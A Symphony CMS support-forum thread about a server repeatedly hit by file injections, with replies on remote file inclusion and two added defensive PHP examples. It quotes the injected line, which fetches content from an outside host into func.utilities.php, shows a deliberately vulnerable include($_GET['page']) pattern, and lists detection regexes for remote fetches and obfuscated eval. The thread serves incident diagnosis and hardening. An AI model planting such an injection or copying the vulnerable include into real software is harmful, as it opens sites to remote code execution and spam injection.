Within the past month someone has managed to inject files, including PHP scripts and HTML spam onto our server. Our server is secure. There is a hole somewhere because this keeps happening.

What version of Symphony are you using? If you are using 1.7, take a look at this, previous post in the Archived Forum.

I am using the newest version; we just upgraded and launched with the newest Symphony a week ago. There was a security flaw in 1.7 too. We had this problem with the last version toward the end of its life-cycle.

This time it looks like they’ve used a file upload field to upload a zip file and an encrypted PHP file.

It bothers me more because we’re using the Google Search Engine extension to search the site and it’s embarrassing when the client asks me why when they search “graduation” they get results for Viagra.

(Since there is no bookmark button, a short reply so the thread shows up in my filter.) Please do keep me posted.

@iPOTS - just curious, do you have a file upload field on the front-end or are they slipping through the back-end? I had a similar situation with some 1.7 sites I had in the past.

no file upload via the front end.

But there is a file upload form on the backend? Is that from a symphony extension?

Perhaps the best thing in this situation would be to send a detailed report of what you think is going on to Allen and Alistair. If you can get hold of server logs for the time period in question, and any IP addresses or additional information, those would be useful too.

Do you have any scripts in addition to Symphony?

@davethegr8 Yes, but nothing third-party. I’ll try and gather more information.

@iPots: Please contact Alistair as soon as possible. (He might ask you for full access to your site to do his own research.)

If there is indeed a problem in the core (or in an extension), this is important for all of us.

Which extension is this? I’m pretty sure that I know what happened. If this is the FileManager, you also need to let Alistair know ASAP.

@davethegr8 - No, we aren’t using any extensions that add any upload functionality.

@michael-e - I agree, I’ve already notified Alistair about the situation.

It sounds to me like Symphony is not the culprit here. If you don’t have any Symphony extensions that upload files, then it’s not possible that this would be caused by Symphony.

It’s more likely that you have another script on your site somewhere that is allowing an anonymous user to POST a request with a URL as a file, and that script downloads that file from the attacker’s server. For example, I know of a popular JavaScript-based RTE that allows this.

The simplest way to secure this vulnerability is to change allow_url_fopen to 0 in PHP’s ini settings. That can be done directly in php.ini.

http://us.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen

Moreover, if you have scripts that do something like this:

http://example.com/page.php?page=home

<?php
// Vulnerable pattern: the request parameter is handed straight to include()
if($_GET["page"]) {
    include($_GET["page"]);
}
?>

You are further at risk, because someone can pass a URL as the page parameter and PHP will happily run whatever PHP code is located in that remote file.

And honestly, if either of these things has happened, then your server is definitely NOT secure (it has allowed arbitrary code execution), and should be wiped.

If you have an openID, you can read more about what to do after a server is compromised here. You need a password to get into the beta, but it’s in a blog post on the same site. If you don’t have an OID, check out this doc: http://www.cert.org/tech_tips/win-UNIX-system_compromise.html
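A hardened replacement for the include($_GET["page"]) pattern shown above, written as an added example for this thread (it is not Symphony code and not the poster's own). It uses an allowlist that maps page names to files the site controls, so the request value never becomes part of a path; that holds whatever the allow_url_fopen setting is, and also closes the local traversal variant (page=../../config.php). The pages/ directory, the page names and PHP 7.0+ syntax are assumptions.

```php
<?php
// Added example: allowlisted page dispatch instead of include($_GET["page"]).
// PAGES is the complete set of values "page" may take; anything else is a 404.
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

/**
 * Resolve the request's "page" value to an absolute path inside pages/,
 * or return null when the value is not on the allowlist.
 */
function resolvePage(array $get)
{
    $page = isset($get['page']) ? $get['page'] : 'home';

    // $_GET values can be arrays (page[]=x), so reject anything but a known string key.
    if (!is_string($page) || !array_key_exists($page, PAGES)) {
        return null;
    }

    // Belt and braces: confirm the resolved file really lives under pages/,
    // so a mistaken allowlist entry cannot point outside it either.
    $base = realpath(__DIR__ . '/pages');
    $path = realpath(__DIR__ . '/' . PAGES[$page]);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$target = resolvePage($_GET);
if ($target === null) {
    http_response_code(404);
    exit('Not found');
}
include $target;   // only ever a file from PAGES, never a URL or user-built path
```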

Update: We had another injection attack; this time, HTML was injected into func.utilities.php. Rackspace is pointing fingers at Symphony, Symphony pointing fingers at Rackspace.

iPOTS are you able to send as much as you know to the core team (Contact link on the footer) as a matter of urgency?

Yes, please send us as much information as possible. If you could, please provide us with FTP detail and access to the Symphony admin.

Will do.

Just an update. We did a top line investigation of the site and found no evidence that the vulnerability was caused by Symphony. We will be doing a more comprehensive investigation, pending some more info from iPOTS.

OK, I am not pointing any fingers. I don’t know if it’s the CMS or if it’s the host, but the injection attacks keep happening. I’ve emailed you the code that was injected. There is a problem somewhere, whether it’s the host or not; I need some input to correct this situation and prevent it from happening any more.

The newest infected file was func.utilities.php with this code at the very bottom:

@ printf (file_get_contents('http://applerepairneworleans.com/baks.txt'));

I’ve since removed it for obvious reasons.

Thanks for looking into the situation; hopefully we’ll stumble upon the problem.
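The injected line quoted above (an error-suppressed printf of file_get_contents on a remote URL, appended to a core file) is the kind of thing a scan over the install can flag. The CLI script below is an added example for this thread, not part of Symphony and not the poster's own tooling; the patterns and the default path are assumptions, and it only finds known shapes, so it supplements rather than replaces comparing the install against a clean copy after a confirmed compromise.

```php
<?php
// Added example: walk a web root and report PHP files carrying patterns
// like the appended file_get_contents('http://...') seen in func.utilities.php.
// Usage: php scan.php /path/to/symphony   (defaults to the current directory)

$root = isset($argv[1]) ? $argv[1] : '.';

// Patterns that are rarely legitimate in a CMS's own PHP files (assumed set).
$suspicious = [
    'remote fetch via URL'  => '/file_get_contents\s*\(\s*[\'"]https?:/i',
    'remote include'        => '/\b(include|require)(_once)?\s*\(?\s*[\'"]https?:/i',
    'obfuscated eval'       => '/\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)/i',
    'error-suppressed call' => '/^\s*@\s*(printf|eval|include|system)\b/mi',
];

// Return a list of "label at line N" strings for every pattern found in $path.
function scanFile($path, array $patterns)
{
    $hits = [];
    $src = file_get_contents($path);
    foreach ($patterns as $label => $re) {
        if (preg_match($re, $src, $m, PREG_OFFSET_CAPTURE)) {
            $line = substr_count(substr($src, 0, $m[0][1]), "\n") + 1;
            $hits[] = sprintf('%s at line %d', $label, $line);
        }
    }
    return $hits;
}

$it = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
);
$flagged = 0;
foreach ($it as $file) {
    if (strtolower($file->getExtension()) !== 'php') {
        continue;
    }
    $hits = scanFile($file->getPathname(), $suspicious);
    if ($hits) {
        $flagged++;
        // The mtime is the first thing to line up against web/FTP logs.
        printf("%s (modified %s)\n  %s\n",
            $file->getPathname(), date('c', $file->getMTime()), implode("\n  ", $hits));
    }
}
printf("%d suspicious file(s)\n", $flagged);
exit($flagged > 0 ? 1 : 0);
```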

Symphony • Open Source XSLT CMS
